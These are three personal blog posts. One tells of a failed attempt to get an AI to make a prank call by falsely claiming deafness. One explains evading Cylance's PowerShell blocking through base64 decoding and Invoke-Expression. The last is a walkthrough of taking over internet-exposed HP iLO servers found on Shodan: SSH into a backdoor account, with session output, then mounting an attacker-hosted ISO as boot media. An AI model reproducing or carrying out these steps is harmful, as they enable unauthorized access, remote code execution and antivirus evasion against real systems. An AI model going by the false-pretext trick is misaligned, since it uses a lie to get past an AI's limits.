When AI Just Doesn’t Get the Joke.

Like many of us, I’ve been exploring creative (and occasionally mischievous) ways to test the limits of AI. Recently, I thought it would be fun to combine AI with TTY services to pull a classic prank call on my wife while she was at work. Spoiler alert: it was a complete failure.

My first prompt went something like this:

“My wife works at [location]. Make a call to that place, get details about the menu and bar, then casually ask about Battletoads.”

The response? A polite but firm “I can’t make calls,” followed by a broken link and a handful of unrelated suggestions that didn’t come close to enabling the harmless mischief I had in mind.

I tried again with a different angle:

“I’m deaf, can you connect to a TTY service to make a call?”

Same result: dead links and unusable advice. After a few more prompts and experiments, it became clear—AI might be powerful, but it has no concept of fun.

Now, I never truly expected AI to get humor the way we do, but I did hope it might at least help facilitate it. Instead, when I asked whether prank calling or even the legendary art of phreaking was still alive, AI’s answer was essentially: not really.

And that’s when it hit me: while AI can automate tasks, analyze data, and streamline workflows, some things are just better left to people. Humor, spontaneity, and a little harmless mischief? That’s our domain.

So here’s my takeaway: AI is a great tool, but it doesn’t replace human creativity, playfulness, or the shared cultural quirks that make us laugh. Those belong to us.

And on that note… is your refrigerator running?

Bypass Cylance AV to run PowerShell Scripts.

So I was trying to automate the installation of some software using PowerShell (PS). Naturally I made up a ps script, but when I attempted to run it on machines with Cylance installed it was blocked by Cylance and it complained that it does not like me trying to run PS scripts. 

Challenge accepted! 

My first attempt was to use EncodedCommand, but wasted a bunch of time and gave up, lol. It has to be a, what I would say is a non-standard base64 encoding, to execute. Didn't find that out until I was a few hours in! Trying to find an easy way to ecode never panned out, even the great cyberchef failed me.

So I couldn't run PS scripts out right and didn't have time for EncodedCommand "im sure I was just doing something wong", so I moved on to Invoke-Expression (IE). 

M$ says, "The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line is returned (echoed) unchanged." 

So we can use IE to execute any string, First I tried to just put my script in a variable, but PS never liked it. I think the line breaks or some char was messing it up, Then looked at reading a file and putting it into a variable. So I base64 encoded the text from my script and used [Convert]::FromBase64String to decode then wrote it to a file in C:\Users\Public\ because I couldn't be sure what user context it was going to write in so I bet on low privileges.  Then used Get-Content -Raw to pull it into a variable, passed it to IE and Whammy! it worked. The most complicated process I could come up with to bypass Cylance PS script blocking :)

Enjoy the 1's and 0's

IPMI exposure over the internet, IPMIPWN & post compromise activities.

Another stop along memory lane is my favored thing to boast about, IPMIPWN! :P

I thought I would dive back into Shodan and check out the status of the attack surface after all this time. As expected, still stocked with targets! So this time around I wanted to took a look beyond penetration and look at post compromise activity.

Its been a while since I first made IPMIPWN, so a few things have changed. The servers out there are so old that the ciphers used for ssh are no longer supported a modern desktop ssh clients by default, making my first ssh attempt post IPMIPWN hax0rin was much like the below:

ssh backdoor2@target.com

Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Google said to added -o KexAlgorithms=diffie-hellman-group14-sha1, Then: 

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com

Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com

Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com

Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1 

And then:

C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com

The authenticity of host 'target.com' can't be established.

DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'target.com' (DSA) to the list of known hosts.

backdoor2@target.com's password:

User:backdoor2 logged-in to ILOBRC444.(target.com)

iLO 3 Standard 1.26 at  Aug 26 2011

Server Name: SER_EPAPAR

Server Power: On

</>hpiLO->

 

Ok, so IPMIPWN got us this far, what next? A few possible attack paths might involve virtual media (VM) functionality. Here is how that might be setup:

First, See what VM is loaded if any

 </>hpiLO-> show map1/oemhp_vm1/cddr1

 Set our own VM

</>hpiLO-> cd map1/oemhp_vm1/cddr1

</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso

Enable our "attacker controlled" VM

 </>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect

Confirm our changes

 </map1/oemhp_vm1/cddr1>hpiLO-> show

I used webhook.site to confirm this attack with great successes, as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, run on boot or network connection confirmation. More attack paths later >:)

Enjoy the 1's and 0's.. 

Happy New Year!!

 

so imma lilate, sue me :P